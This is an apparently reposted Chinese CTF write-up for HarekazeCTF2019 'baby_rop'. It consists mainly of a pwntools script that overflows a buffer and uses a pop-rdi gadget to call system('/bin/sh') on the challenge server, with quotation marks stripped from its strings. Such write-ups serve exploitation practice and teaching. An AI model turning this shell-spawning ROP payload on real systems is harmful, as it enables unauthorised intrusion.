码迷,mamicode.com
首页 > 其他好文 > 详细

[HarekazeCTF2019]baby_rop

时间:2020-02-10 11:31:05      阅读:138      评论:0      收藏:0      [点我收藏+]

标签:lin   rop   inter   end   import   code   style   bin   span   

程序已经给了system和binsh ,用寄存器传参就可以了

from pwn import *

r=remote(node3.buuoj.cn,25737)
elf=ELF(./babyrop)
system_addr=elf.symbols[system]
binsh_addr=0x601048
rdi_addr=0x400683

payload=a*0x10+b*0x8+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)+p64(0xdeadbeef) #system(/bin/sh)
r.sendline(payload)

r.interactive()

 

[HarekazeCTF2019]baby_rop

标签:lin   rop   inter   end   import   code   style   bin   span   

原文地址:https://www.cnblogs.com/gaonuoqi/p/12290099.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!